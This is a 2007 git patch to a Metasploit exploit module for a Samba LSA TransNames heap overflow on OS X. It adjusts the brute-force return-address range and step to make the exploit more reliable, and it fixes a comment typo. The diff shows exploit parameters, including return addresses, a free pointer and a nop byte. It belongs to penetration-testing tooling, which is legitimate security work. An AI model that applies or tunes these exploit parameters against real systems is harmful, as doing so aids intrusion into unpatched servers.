From 0744aa075d4a12dd0a0afc633713bcbb026c5bf0 Mon Sep 17 00:00:00 2001
From: Ramon de C Valle <rcvalle@live.com>
Date: Tue, 24 Jul 2007 23:44:44 +0000
Subject: [PATCH] Improved reliability (thanks fab).

git-svn-id: file:///home/svn/framework3/trunk@5059 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/exploits/osx/samba/lsa_transnames_heap.rb | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/osx/samba/lsa_transnames_heap.rb b/modules/exploits/osx/samba/lsa_transnames_heap.rb
index 5b8bf38667..310e6fcb92 100644
--- a/modules/exploits/osx/samba/lsa_transnames_heap.rb
+++ b/modules/exploits/osx/samba/lsa_transnames_heap.rb
@@ -59,9 +59,9 @@ class Exploits::Osx::Samba::LSA_TransNames_Heap < Msf::Exploit::Remote
 						'Nops'          => 4 * 1024,
 						'Bruteforce' =>
 							{
-								'Start' => { 'Ret' => 0x01813000 },
-								'Stop'  => { 'Ret' => 0x01823000 },
-								'Step'  => 4388,
+								'Start' => { 'Ret' => 0x01818000 },
+								'Stop'  => { 'Ret' => 0x01830000 },
+								'Step'  => 3351,
 							},
 					}
 					],
@@ -166,7 +166,7 @@ class Exploits::Osx::Samba::LSA_TransNames_Heap < Msf::Exploit::Remote
 			#
 			# We don't use the size() pointer anymore because it
 			# results in a unexpected behavior when smbd process
-			# is started by lauchd.
+			# is started by launchd.
 			#
 			free_pointer = 0x1800018
 			nop = "\x16"